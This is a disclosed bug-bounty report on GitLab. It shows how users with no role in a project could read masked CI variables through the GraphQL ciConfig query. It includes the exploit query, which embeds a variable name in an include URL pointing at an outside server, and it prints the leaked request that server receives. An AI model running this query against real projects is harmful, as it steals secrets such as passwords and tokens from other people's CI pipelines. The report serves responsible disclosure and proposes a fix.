**[HackerOne report #1511133](https://hackerone.com/reports/1511133)** by `shells3c` on 2022-03-14, assigned to @dcouture: [Report](#report) | [How To Reproduce](#how-to-reproduce) ## Report ##### Summary External users/users without privilege/guests (depends on project visibility) can access CI variables of a Gitlab project using GraphQL. The table below explains all situations that a user can access CI variables: | Project visibility | Public Project | Internal Project | Private Project | | --------------- | ------------- | --------------- | --------------- | | External user | Yes | No | No | | User | Yes | Yes | No | | Guest | Yes | Yes | Yes | ##### Steps to reproduce 1. Create a project, then create a masked CI variable in the project name `PASSWORD`, disable **Protect variable** and enable **Mask variable** 2. From another account (no role in the project), run the following query in the GraphQL Explorer ```graphql { ciConfig( projectPath: "dcouture/public_project" content: "include: https://[redacted]/$VARIABLE_NAME.yaml" ) { errors } } ``` 3. The server at `example.com` will receive the following request ```http GET /[YOUR PASSWORD HERE].yaml HTTP/1.0 Host: [redacted] Connection: close Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3 Accept: */* User-Agent: Ruby ``` ##### What is the current *bug* behavior? GraphQL operation `getCiConfigData` loads all CI variables of the project including custom ones in the background ##### What is the expected *correct* behavior? GraphQL operation `getCiConfigData` shouldn't be able to access project's custom variables ##### Output of checks This bug happens on GitLab.com #### Impact Accessing CI variables, including sensitive masked variables of Gitlab projects without permission ## Proposal Update `Resolvers::Ci::ConfigResolver` to authorize using the `create_pipeline` policy.